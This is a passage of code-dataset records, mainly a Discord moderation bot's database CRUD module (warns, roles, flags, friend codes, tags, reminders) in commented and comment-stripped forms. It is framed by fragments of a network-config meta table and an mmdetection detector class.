_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables']['meta_info'].parent =_meta_table['Evpn']['meta_info']
| true
| true
|
f705108a187baf052d5db4933fed18471b99b3db
| 11,826
|
py
|
Python
|
utils/crud.py
|
DaQueenJodi/Kurisu
|
2a4e9010c862c2dcffb406d3596ed9a115533154
|
[
"Apache-2.0"
] | null | null | null |
utils/crud.py
|
DaQueenJodi/Kurisu
|
2a4e9010c862c2dcffb406d3596ed9a115533154
|
[
"Apache-2.0"
] | null | null | null |
utils/crud.py
|
DaQueenJodi/Kurisu
|
2a4e9010c862c2dcffb406d3596ed9a115533154
|
[
"Apache-2.0"
] | null | null | null |
from . import models
import datetime
from discord import utils, TextChannel
def generate_id():
    """Return a new unique ID: a Discord snowflake derived from the current time."""
    return utils.time_snowflake(datetime.datetime.now())


async def add_permanent_role(user_id: int, role_id: int):
    """Attach a permanent role to a member; no-op if the pairing already exists."""
    await add_dbmember_if_not_exist(user_id)
    if not await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
            models.PermanentRole.role_id == role_id)).gino.first():
        return await models.PermanentRole.create(user_id=user_id, role_id=role_id)


async def remove_permanent_role(user_id: int, role_id: int):
    """Detach a permanent role from a member.

    Returns the deleted row, or None if no such pairing existed.
    """
    permanent_role = await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
            models.PermanentRole.role_id == role_id)).gino.first()
    if permanent_role:
        await permanent_role.delete()
    return permanent_role


async def get_permanent_roles(user_id: int):
    """Return all Role rows permanently assigned to *user_id* (None if member unknown)."""
    db_member = await get_dbmember(user_id)
    if db_member:
        return await models.Role.query.where((models.Role.id == models.PermanentRole.role_id) & (models.PermanentRole.user_id == db_member.id)).gino.all()
async def add_staff(user_id: int, position: str):
    """Create a staff entry for *user_id*, or update the position of an existing one."""
    await add_dbmember_if_not_exist(user_id)
    staff = await get_staff(user_id) or await get_helper(user_id)
    if staff:
        await staff.update(position=position).apply()
    else:
        await models.Staff.create(id=user_id, position=position)


async def add_helper(user_id: int, position: str, console: str = None):
    """Register *user_id* as a helper for *console*.

    NOTE(review): when a staff row already exists only the console is
    updated, not the position — presumably so an existing staffer keeps
    their rank when gaining a console; confirm against callers.
    """
    await add_dbmember_if_not_exist(user_id)
    if staff := await get_staff(user_id):
        await staff.update(console=console).apply()
    else:
        await models.Staff.create(id=user_id, position=position, console=console)


async def remove_staff(user_id: int):
    """Remove staff status; console helpers are demoted to 'Helper' instead of deleted."""
    staff = await get_staff(user_id)
    if staff:
        if staff.console:
            await staff.update(position="Helper").apply()
        else:
            await staff.delete()


async def remove_helper(user_id: int):
    """Remove helper status; staff members only lose their console assignment."""
    helper = await get_helper(user_id)
    if helper:
        if helper.position != "Helper":
            await helper.update(console=None).apply()
        else:
            await helper.delete()


async def get_staff_all():
    """Return all staff rows excluding plain helpers."""
    return await models.Staff.query.where(models.Staff.position != 'Helper').gino.all()


async def get_staff(user_id: int):
    """Return the staff row for *user_id* (excluding plain helpers), or None."""
    return await models.Staff.query.where(
        (models.Staff.position != 'Helper') & (models.Staff.id == user_id)).gino.first()


async def get_helpers():
    """Return all rows with a console assignment, i.e. active helpers."""
    return await models.Staff.query.where(models.Staff.console.isnot(None)).gino.all()


async def get_helper(user_id: int):
    """Return the Staff row for *user_id* regardless of position, or None."""
    return await models.Staff.query.where(models.Staff.id == user_id).gino.first()
async def add_warn(user_id: int, issuer_id: int, reason: str):
    """Record a warn against *user_id* issued by *issuer_id*."""
    await add_dbmember_if_not_exist(user_id)
    await add_dbmember_if_not_exist(issuer_id)
    await models.Warn.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)


async def copy_warn(user_id: int, warn: models.Warn):
    """Duplicate *warn* onto *user_id*, bumping the snowflake until it is unique."""
    await add_dbmember_if_not_exist(user_id)
    warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
    while await get_warn(warn.id):
        # Keep shifting the embedded timestamp by 1 ms until the ID is free.
        warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
    warn.user = user_id
    await warn.create()


async def get_warn(warn_id: int):
    """Return the warn with primary key *warn_id*, or None."""
    return await models.Warn.get(warn_id)


async def get_warns(user_id: int):
    """Return all warns recorded against *user_id*."""
    return await models.Warn.query.where(models.Warn.user == user_id).gino.all()
async def remove_warn_id(user_id: int, index: int):
    """Delete the *index*-th (1-based) warn of *user_id*, if it exists.

    Guards against an out-of-range index: ``.first()`` returns None in
    that case and the old code crashed with AttributeError on ``.delete()``.
    """
    warn = await models.Warn.query.where(models.Warn.user == user_id).offset(index - 1).gino.first()
    if warn:
        await warn.delete()
async def remove_warns(user_id: int):
    """Delete all warns of *user_id* and return how many were removed."""
    n_warns = await (models.db.select([models.db.func.count()]).where(models.Warn.user == user_id).gino.scalar())
    if n_warns:
        await models.Warn.delete.where(models.Warn.user == user_id).gino.status()
    return n_warns
async def add_timed_restriction(user_id: int, end_date: datetime.datetime, type: str):
    """Record a restriction of kind *type* on *user_id* expiring at *end_date*."""
    await add_dbmember_if_not_exist(user_id)
    await models.TimedRestriction.create(id=generate_id(), user=user_id, type=type,
                                         end_date=end_date)


async def get_time_restrictions_by_user(user_id: int):
    """Return every timed restriction currently stored for *user_id*."""
    return await models.TimedRestriction.query.where(models.TimedRestriction.user == user_id).gino.all()


async def get_time_restrictions_by_user_type(user_id: int, type: str):
    """Return the restriction of kind *type* for *user_id*, or None."""
    return await models.TimedRestriction.query.where((models.TimedRestriction.user == user_id) & (
            models.TimedRestriction.type == type)).gino.first()


async def get_time_restrictions_by_type(type: str):
    """Return all restrictions of kind *type* across users."""
    return await models.TimedRestriction.query.where(models.TimedRestriction.type == type).gino.all()


async def remove_timed_restriction(user_id: int, type: str):
    """Delete the restriction of kind *type* for *user_id*, if present."""
    time_restriction = await get_time_restrictions_by_user_type(user_id, type)
    if time_restriction:
        await time_restriction.delete()


async def set_time_restriction_alert(user_id: int, type: str):
    """Mark the restriction of kind *type* for *user_id* as already alerted."""
    time_restriction = await get_time_restrictions_by_user_type(user_id, type)
    if time_restriction:
        await time_restriction.update(alerted=True).apply()


async def add_timed_role(user_id: int, role_id: int, expiring_date: datetime.datetime):
    """Create a timed role, or refresh its expiry if it already exists.

    Returns the created or updated row.
    """
    await add_dbmember_if_not_exist(user_id)
    entry = await get_time_role_by_user_type(user_id, role_id)
    if not entry:
        return await models.TimedRole.create(id=generate_id(), user_id=user_id, role_id=role_id, expiring_date=expiring_date)
    await entry.update(expiring_date=expiring_date).apply()
    return entry


async def remove_timed_role(user_id: int, role_id: int):
    """Delete the timed role pairing (*user_id*, *role_id*), if it exists."""
    timed_role = await get_time_role_by_user_type(user_id, role_id)
    if timed_role:
        await timed_role.delete()


async def get_time_role_by_user_type(user_id: int, role_id: int):
    """Return the timed role row for (*user_id*, *role_id*), or None."""
    return await models.TimedRole.query.where(
        (models.TimedRole.user_id == user_id) & (models.TimedRole.role_id == role_id)).gino.first()


async def get_timed_roles():
    """Return every timed role row."""
    return await models.TimedRole.query.gino.all()
async def add_flag(name: str):
    """Create a feature flag called *name* (value defaults per the model)."""
    await models.Flag.create(name=name)


async def get_flag(name: str):
    """Return the stored boolean value of flag *name*, or None if absent.

    NOTE(review): this returns the *value*, not the Flag row — callers that
    need the row itself must fetch it via ``models.Flag.get``.
    """
    if flag := await models.Flag.get(name):
        return flag.value
    return None
async def remove_flag(name: str):
    """Delete the Flag row called *name*, if it exists.

    Fetches the row directly: the previous implementation used
    ``get_flag()``, which returns the flag's boolean *value* rather than
    the row, so ``.delete()`` raised AttributeError — and a stored False
    value made the flag look absent entirely.
    """
    flag = await models.Flag.get(name)
    if flag:
        await flag.delete()
async def set_flag(name: str, value: bool):
    """Set the stored value of flag *name*, if the flag exists.

    Fetches the Flag row directly: ``get_flag()`` returns the boolean
    value, not the row, so ``.update()`` on it failed — and a flag whose
    stored value was False could never be updated at all.
    """
    flag = await models.Flag.get(name)
    if flag:
        await flag.update(value=value).apply()
async def add_softban(user_id: int, issuer_id: int, reason: str):
    """Record a softban of *user_id* issued by *issuer_id*."""
    await add_dbmember_if_not_exist(user_id)
    await models.Softban.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)


async def remove_softban(user_id: int):
    """Delete the softban of *user_id*, if any."""
    softban = await get_softban(user_id)
    if softban:
        await softban.delete()


async def add_dbmember(user_id: int):
    """Insert a Member row for *user_id* and return it."""
    return await models.Member.create(id=user_id)


async def add_dbmember_if_not_exist(user_id: int):
    """Return the Member row for *user_id*, creating it first if needed."""
    db_member = await get_dbmember(user_id)
    if not db_member:
        db_member = await add_dbmember(user_id)
    return db_member


async def get_dbmember(user_id: int):
    """Return the Member row for *user_id*, or None."""
    return await models.Member.get(user_id)


async def add_dbchannel(channel_id: int, name: str):
    """Insert a Channel row and return it."""
    return await models.Channel.create(id=channel_id, name=name)


async def get_dbchannel(channel_id: int):
    """Return the Channel row for *channel_id*, or None."""
    return await models.Channel.get(channel_id)


async def add_dbrole(role_id: int, name: str):
    """Insert a Role row and return it."""
    return await models.Role.create(id=role_id, name=name)


async def get_dbrole(role_id: int):
    """Return the Role row for *role_id*, or None."""
    return await models.Role.get(role_id)


async def get_softban(user_id: int):
    """Return the softban row for *user_id*, or None."""
    return await models.Softban.query.where(models.Softban.user == user_id).gino.first()


async def add_watch(user_id: int):
    """Flag *user_id* as watched, creating the member row if needed."""
    db_member = await add_dbmember_if_not_exist(user_id)
    await db_member.update(watched=True).apply()


async def remove_watch(user_id: int):
    """Clear the watched flag of *user_id*, if the member exists."""
    db_member = await get_dbmember(user_id)
    if db_member:
        await db_member.update(watched=False).apply()


async def is_watched(user_id: int):
    """Return True if *user_id* is currently watched."""
    db_member = await get_dbmember(user_id)
    return db_member.watched if db_member else False


async def add_nofilter(channel: TextChannel):
    """Exempt *channel* from the word filter, creating its row if needed."""
    db_channel = await get_dbchannel(channel.id)
    if not db_channel:
        db_channel = await add_dbchannel(channel.id, channel.name)
    await db_channel.update(nofilter=True).apply()
async def remove_nofilter(channel: TextChannel):
    """Re-enable filtering for *channel* by clearing its nofilter flag.

    Fixes a copy-paste bug: the old code set ``nofilter=True``, making this
    an exact duplicate of ``add_nofilter`` — the exemption could never be
    removed. Removing it must store False.
    """
    db_channel = await get_dbchannel(channel.id)
    if db_channel:
        await db_channel.update(nofilter=False).apply()
async def check_nofilter(channel: TextChannel):
    """Return True if *channel* is exempt from the word filter."""
    channel = await models.Channel.get(channel.id)
    return channel.nofilter if channel else False


async def add_friendcode_3ds(user_id: int, fc: int):
    """Store (or replace) the 3DS friend code of *user_id*."""
    await add_dbmember_if_not_exist(user_id)
    if fcs := await get_friendcode(user_id):
        await fcs.update(fc_3ds=fc).apply()
        return
    await models.FriendCode.create(id=user_id, fc_3ds=fc)


async def add_friendcode_switch(user_id: int, fc: int):
    """Store (or replace) the Switch friend code of *user_id*."""
    await add_dbmember_if_not_exist(user_id)
    if fcs := await get_friendcode(user_id):
        await fcs.update(fc_switch=fc).apply()
        return
    await models.FriendCode.create(id=user_id, fc_switch=fc)


async def get_friendcode(user_id: int):
    """Return the FriendCode row of *user_id*, or None."""
    return await models.FriendCode.get(user_id)


async def delete_friendcode_3ds(user_id: int):
    """Clear the 3DS friend code; drop the row entirely once both codes are gone."""
    friendcodes = await get_friendcode(user_id)
    if friendcodes:
        await friendcodes.update(fc_3ds=None).apply()
        if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
            await friendcodes.delete()


async def delete_friendcode_switch(user_id: int):
    """Clear the Switch friend code; drop the row entirely once both codes are gone."""
    friendcodes = await get_friendcode(user_id)
    if friendcodes:
        await friendcodes.update(fc_switch=None).apply()
        if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
            await friendcodes.delete()


async def add_rule(number: int, description: str):
    """Create rule *number* unless it already exists."""
    rule = await get_rule(number)
    if not rule:
        await models.Rule.create(id=number, description=description)


async def edit_rule(number: int, description: str):
    """Replace the description of rule *number*, if it exists."""
    rule = await get_rule(number)
    if rule:
        await rule.update(description=description).apply()


async def delete_rule(number: int):
    """Delete rule *number*, if it exists."""
    rule = await get_rule(number)
    if rule:
        await rule.delete()


async def get_rules():
    """Return all rules ordered by number."""
    return await models.Rule.query.order_by(models.Rule.id).gino.all()


async def get_rule(number: int):
    """Return rule *number*, or None."""
    return await models.Rule.get(number)


async def add_reminder(date: datetime.datetime, author: int, reminder: str):
    """Schedule a reminder for *author* at *date*."""
    await add_dbmember_if_not_exist(author)
    await models.RemindMeEntry.create(id=generate_id(), date=date, author=author, reminder=reminder)


async def get_reminders() -> list[models.RemindMeEntry]:
    """Return all reminders ordered by due date."""
    return await models.RemindMeEntry.query.order_by(models.RemindMeEntry.date).gino.all()


async def remove_reminder(reminder_id: int):
    """Delete the reminder with primary key *reminder_id*.

    NOTE(review): raises AttributeError for an unknown ID — callers are
    expected to pass IDs obtained from get_reminders().
    """
    db_reminder = await models.RemindMeEntry.get(reminder_id)
    await db_reminder.delete()


async def create_tag(title: str, content: str, author: int):
    """Create a tag owned by *author*."""
    await add_dbmember_if_not_exist(author)
    await models.Tag.create(id=generate_id(), title=title, content=content, author=author)


async def get_tag(title: str) -> models.Tag:
    """Return the tag titled exactly *title*, or None."""
    return await models.Tag.query.where(models.Tag.title == title).gino.first()


async def get_tags() -> list[models.Tag]:
    """Return all tags in creation order (snowflake IDs are time-ordered)."""
    return await models.Tag.query.order_by(models.Tag.id).gino.all()


async def search_tags(query: str) -> list[models.Tag]:
    """Return up to 10 tags whose title contains *query* (case-insensitive)."""
    return await models.Tag.query.where(models.Tag.title.ilike(f"%{query}%")).limit(10).gino.all()


async def delete_tag(title: str):
    """Delete the tag named *title*.

    NOTE(review): raises AttributeError if the tag does not exist.
    """
    db_tag = await get_tag(title)
    await db_tag.delete()
| 31.876011
| 154
| 0.726958
|
from . import models
import datetime
from discord import utils, TextChannel
# NOTE(review): byte-duplicate of generate_id..get_warns above — this is the
# dataset record's comment-stripped column. See those definitions for docs.
def generate_id():
    return utils.time_snowflake(datetime.datetime.now())

async def add_permanent_role(user_id: int, role_id: int):
    await add_dbmember_if_not_exist(user_id)
    if not await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
            models.PermanentRole.role_id == role_id)).gino.first():
        return await models.PermanentRole.create(user_id=user_id, role_id=role_id)

async def remove_permanent_role(user_id: int, role_id: int):
    permanent_role = await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
            models.PermanentRole.role_id == role_id)).gino.first()
    if permanent_role:
        await permanent_role.delete()
    return permanent_role

async def get_permanent_roles(user_id: int):
    db_member = await get_dbmember(user_id)
    if db_member:
        return await models.Role.query.where((models.Role.id == models.PermanentRole.role_id) & (models.PermanentRole.user_id == db_member.id)).gino.all()

async def add_staff(user_id: int, position: str):
    await add_dbmember_if_not_exist(user_id)
    staff = await get_staff(user_id) or await get_helper(user_id)
    if staff:
        await staff.update(position=position).apply()
    else:
        await models.Staff.create(id=user_id, position=position)

async def add_helper(user_id: int, position: str, console: str = None):
    await add_dbmember_if_not_exist(user_id)
    if staff := await get_staff(user_id):
        await staff.update(console=console).apply()
    else:
        await models.Staff.create(id=user_id, position=position, console=console)

async def remove_staff(user_id: int):
    staff = await get_staff(user_id)
    if staff:
        if staff.console:
            await staff.update(position="Helper").apply()
        else:
            await staff.delete()

async def remove_helper(user_id: int):
    helper = await get_helper(user_id)
    if helper:
        if helper.position != "Helper":
            await helper.update(console=None).apply()
        else:
            await helper.delete()

async def get_staff_all():
    return await models.Staff.query.where(models.Staff.position != 'Helper').gino.all()

async def get_staff(user_id: int):
    return await models.Staff.query.where(
        (models.Staff.position != 'Helper') & (models.Staff.id == user_id)).gino.first()

async def get_helpers():
    return await models.Staff.query.where(models.Staff.console.isnot(None)).gino.all()

async def get_helper(user_id: int):
    return await models.Staff.query.where(models.Staff.id == user_id).gino.first()

async def add_warn(user_id: int, issuer_id: int, reason: str):
    await add_dbmember_if_not_exist(user_id)
    await add_dbmember_if_not_exist(issuer_id)
    await models.Warn.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)

async def copy_warn(user_id: int, warn: models.Warn):
    await add_dbmember_if_not_exist(user_id)
    warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
    while await get_warn(warn.id):
        warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
    warn.user = user_id
    await warn.create()

async def get_warn(warn_id: int):
    return await models.Warn.get(warn_id)

async def get_warns(user_id: int):
    return await models.Warn.query.where(models.Warn.user == user_id).gino.all()
async def remove_warn_id(user_id: int, index: int):
    """Delete the *index*-th (1-based) warn of *user_id*, if it exists.

    Guards against an out-of-range index: ``.first()`` returns None in
    that case and the old code crashed with AttributeError on ``.delete()``.
    """
    warn = await models.Warn.query.where(models.Warn.user == user_id).offset(index - 1).gino.first()
    if warn:
        await warn.delete()
# NOTE(review): continuation of the comment-stripped duplicate column
# (remove_warns..get_flag); see the documented definitions above.
async def remove_warns(user_id: int):
    n_warns = await (models.db.select([models.db.func.count()]).where(models.Warn.user == user_id).gino.scalar())
    if n_warns:
        await models.Warn.delete.where(models.Warn.user == user_id).gino.status()
    return n_warns

async def add_timed_restriction(user_id: int, end_date: datetime.datetime, type: str):
    await add_dbmember_if_not_exist(user_id)
    await models.TimedRestriction.create(id=generate_id(), user=user_id, type=type,
                                         end_date=end_date)

async def get_time_restrictions_by_user(user_id: int):
    return await models.TimedRestriction.query.where(models.TimedRestriction.user == user_id).gino.all()

async def get_time_restrictions_by_user_type(user_id: int, type: str):
    return await models.TimedRestriction.query.where((models.TimedRestriction.user == user_id) & (
            models.TimedRestriction.type == type)).gino.first()

async def get_time_restrictions_by_type(type: str):
    return await models.TimedRestriction.query.where(models.TimedRestriction.type == type).gino.all()

async def remove_timed_restriction(user_id: int, type: str):
    time_restriction = await get_time_restrictions_by_user_type(user_id, type)
    if time_restriction:
        await time_restriction.delete()

async def set_time_restriction_alert(user_id: int, type: str):
    time_restriction = await get_time_restrictions_by_user_type(user_id, type)
    if time_restriction:
        await time_restriction.update(alerted=True).apply()

async def add_timed_role(user_id: int, role_id: int, expiring_date: datetime.datetime):
    await add_dbmember_if_not_exist(user_id)
    entry = await get_time_role_by_user_type(user_id, role_id)
    if not entry:
        return await models.TimedRole.create(id=generate_id(), user_id=user_id, role_id=role_id, expiring_date=expiring_date)
    await entry.update(expiring_date=expiring_date).apply()
    return entry

async def remove_timed_role(user_id: int, role_id: int):
    timed_role = await get_time_role_by_user_type(user_id, role_id)
    if timed_role:
        await timed_role.delete()

async def get_time_role_by_user_type(user_id: int, role_id: int):
    return await models.TimedRole.query.where(
        (models.TimedRole.user_id == user_id) & (models.TimedRole.role_id == role_id)).gino.first()

async def get_timed_roles():
    return await models.TimedRole.query.gino.all()

async def add_flag(name: str):
    await models.Flag.create(name=name)

async def get_flag(name: str):
    if flag := await models.Flag.get(name):
        return flag.value
    return None
async def remove_flag(name: str):
    """Delete the Flag row called *name*, if it exists.

    Fetches the row directly: ``get_flag()`` returns the flag's boolean
    *value*, not the row, so ``.delete()`` raised AttributeError — and a
    stored False value made the flag look absent entirely.
    """
    flag = await models.Flag.get(name)
    if flag:
        await flag.delete()
async def set_flag(name: str, value: bool):
    """Set the stored value of flag *name*, if the flag exists.

    Fetches the Flag row directly: ``get_flag()`` returns the boolean
    value, not the row, so ``.update()`` on it failed — and a flag whose
    stored value was False could never be updated at all.
    """
    flag = await models.Flag.get(name)
    if flag:
        await flag.update(value=value).apply()
# NOTE(review): continuation of the comment-stripped duplicate column
# (add_softban..add_nofilter); see the documented definitions above.
async def add_softban(user_id: int, issuer_id: int, reason: str):
    await add_dbmember_if_not_exist(user_id)
    await models.Softban.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)

async def remove_softban(user_id: int):
    softban = await get_softban(user_id)
    if softban:
        await softban.delete()

async def add_dbmember(user_id: int):
    return await models.Member.create(id=user_id)

async def add_dbmember_if_not_exist(user_id: int):
    db_member = await get_dbmember(user_id)
    if not db_member:
        db_member = await add_dbmember(user_id)
    return db_member

async def get_dbmember(user_id: int):
    return await models.Member.get(user_id)

async def add_dbchannel(channel_id: int, name: str):
    return await models.Channel.create(id=channel_id, name=name)

async def get_dbchannel(channel_id: int):
    return await models.Channel.get(channel_id)

async def add_dbrole(role_id: int, name: str):
    return await models.Role.create(id=role_id, name=name)

async def get_dbrole(role_id: int):
    return await models.Role.get(role_id)

async def get_softban(user_id: int):
    return await models.Softban.query.where(models.Softban.user == user_id).gino.first()

async def add_watch(user_id: int):
    db_member = await add_dbmember_if_not_exist(user_id)
    await db_member.update(watched=True).apply()

async def remove_watch(user_id: int):
    db_member = await get_dbmember(user_id)
    if db_member:
        await db_member.update(watched=False).apply()

async def is_watched(user_id: int):
    db_member = await get_dbmember(user_id)
    return db_member.watched if db_member else False

async def add_nofilter(channel: TextChannel):
    db_channel = await get_dbchannel(channel.id)
    if not db_channel:
        db_channel = await add_dbchannel(channel.id, channel.name)
    await db_channel.update(nofilter=True).apply()
async def remove_nofilter(channel: TextChannel):
    """Re-enable filtering for *channel* by clearing its nofilter flag.

    Fixes a copy-paste bug: the old code set ``nofilter=True``, making this
    an exact duplicate of ``add_nofilter`` — the exemption could never be
    removed. Removing it must store False.
    """
    db_channel = await get_dbchannel(channel.id)
    if db_channel:
        await db_channel.update(nofilter=False).apply()
# NOTE(review): continuation of the comment-stripped duplicate column
# (check_nofilter..delete_tag); see the documented definitions above.
async def check_nofilter(channel: TextChannel):
    channel = await models.Channel.get(channel.id)
    return channel.nofilter if channel else False

async def add_friendcode_3ds(user_id: int, fc: int):
    await add_dbmember_if_not_exist(user_id)
    if fcs := await get_friendcode(user_id):
        await fcs.update(fc_3ds=fc).apply()
        return
    await models.FriendCode.create(id=user_id, fc_3ds=fc)

async def add_friendcode_switch(user_id: int, fc: int):
    await add_dbmember_if_not_exist(user_id)
    if fcs := await get_friendcode(user_id):
        await fcs.update(fc_switch=fc).apply()
        return
    await models.FriendCode.create(id=user_id, fc_switch=fc)

async def get_friendcode(user_id: int):
    return await models.FriendCode.get(user_id)

async def delete_friendcode_3ds(user_id: int):
    friendcodes = await get_friendcode(user_id)
    if friendcodes:
        await friendcodes.update(fc_3ds=None).apply()
        if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
            await friendcodes.delete()

async def delete_friendcode_switch(user_id: int):
    friendcodes = await get_friendcode(user_id)
    if friendcodes:
        await friendcodes.update(fc_switch=None).apply()
        if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
            await friendcodes.delete()

async def add_rule(number: int, description: str):
    rule = await get_rule(number)
    if not rule:
        await models.Rule.create(id=number, description=description)

async def edit_rule(number: int, description: str):
    rule = await get_rule(number)
    if rule:
        await rule.update(description=description).apply()

async def delete_rule(number: int):
    rule = await get_rule(number)
    if rule:
        await rule.delete()

async def get_rules():
    return await models.Rule.query.order_by(models.Rule.id).gino.all()

async def get_rule(number: int):
    return await models.Rule.get(number)

async def add_reminder(date: datetime.datetime, author: int, reminder: str):
    await add_dbmember_if_not_exist(author)
    await models.RemindMeEntry.create(id=generate_id(), date=date, author=author, reminder=reminder)

async def get_reminders() -> list[models.RemindMeEntry]:
    return await models.RemindMeEntry.query.order_by(models.RemindMeEntry.date).gino.all()

async def remove_reminder(reminder_id: int):
    db_reminder = await models.RemindMeEntry.get(reminder_id)
    await db_reminder.delete()

async def create_tag(title: str, content: str, author: int):
    await add_dbmember_if_not_exist(author)
    await models.Tag.create(id=generate_id(), title=title, content=content, author=author)

async def get_tag(title: str) -> models.Tag:
    return await models.Tag.query.where(models.Tag.title == title).gino.first()

async def get_tags() -> list[models.Tag]:
    return await models.Tag.query.order_by(models.Tag.id).gino.all()

async def search_tags(query: str) -> list[models.Tag]:
    return await models.Tag.query.where(models.Tag.title.ilike(f"%{query}%")).limit(10).gino.all()

async def delete_tag(title: str):
    db_tag = await get_tag(title)
    await db_tag.delete()
| true
| true
|
f70510cecaf633bc140f5d0280b6040db7788e73
| 9,585
|
py
|
Python
|
bdd_mtl/mmdet/models/detectors/two_stage.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | 79
|
2020-04-23T04:39:00.000Z
|
2022-03-08T09:50:09.000Z
|
mmdet/models/detectors/two_stage_ori.py
|
xyldmc/siamese-mask-rcnn_mmdetection
|
999e5bfcbd3c493bf69b8556c40eb26c9feeb459
|
[
"Apache-2.0"
] | 3
|
2021-11-04T20:39:52.000Z
|
2022-03-10T20:29:47.000Z
|
mmdet/models/detectors/two_stage_ori.py
|
ducminhkhoi/FAPIS
|
c89703006a2a5250f4d1c71e0aad958d72526885
|
[
"Apache-2.0"
] | 29
|
2020-04-23T07:49:15.000Z
|
2022-03-26T11:48:53.000Z
|
import torch
import torch.nn as nn
from .base import BaseDetector
from .test_mixins import RPNTestMixin, BBoxTestMixin, MaskTestMixin
from .. import builder
from ..registry import DETECTORS
from mmdet.core import bbox2roi, bbox2result, build_assigner, build_sampler
@DETECTORS.register_module
class TwoStageDetector(BaseDetector, RPNTestMixin, BBoxTestMixin,
                       MaskTestMixin):
    """Base class for two-stage detectors (e.g. Faster/Mask R-CNN style).

    Stage 1 is a region proposal network (RPN); stage 2 classifies and
    refines the proposals with RoI heads (a bbox head and an optional
    mask head, optionally behind a shared head).
    """

    def __init__(self,
                 backbone,
                 neck=None,
                 shared_head=None,
                 rpn_head=None,
                 bbox_roi_extractor=None,
                 bbox_head=None,
